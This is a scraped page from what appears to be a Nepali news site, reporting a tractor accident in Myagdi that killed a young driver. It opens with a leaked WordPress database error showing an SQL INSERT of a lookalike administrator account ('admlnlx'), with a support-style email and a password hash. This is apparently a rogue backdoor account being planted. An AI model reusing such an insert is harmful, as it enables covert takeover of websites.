WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1kWJi5FSuA4ZRMJnQ4ISXKjn.Ys.E0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:41:39', '', 'admlnlx', 'admlnlx')
बाबियाचौर (म्याग्दी), पुस ७ –
म्याग्दीको बिममा बिहीबार बिहान ट्र्याक्टर दुर्घटना हुँदा चालकको मृत्यु भएको छ ।
बिमको डाँडागाउँबाट दरवाङ जाँदै गरेको लु३त ४३४० नं को ट्र्याक्टर बिम–१ बिवत भन्ने ठाउँमा दुर्घटना भएको थियो ।
अनियन्त्रित भएर सडकमा पल्टिँदा चालक ताकम–८ का २४ वर्षीय राम श्रीपालीको घटनास्थलमै मृत्यु भएको जिल्ला प्रहरी कार्यालयले जनाएको छ ।
प्रहरीले ट्र्याक्टरको इन्जिनको भागले च्यापिएर ज्यान गुमाएका श्रीपालीको शव निकालेर परीक्षणका लागि जिल्ला अस्पतालमा पठाएको छ । – रासस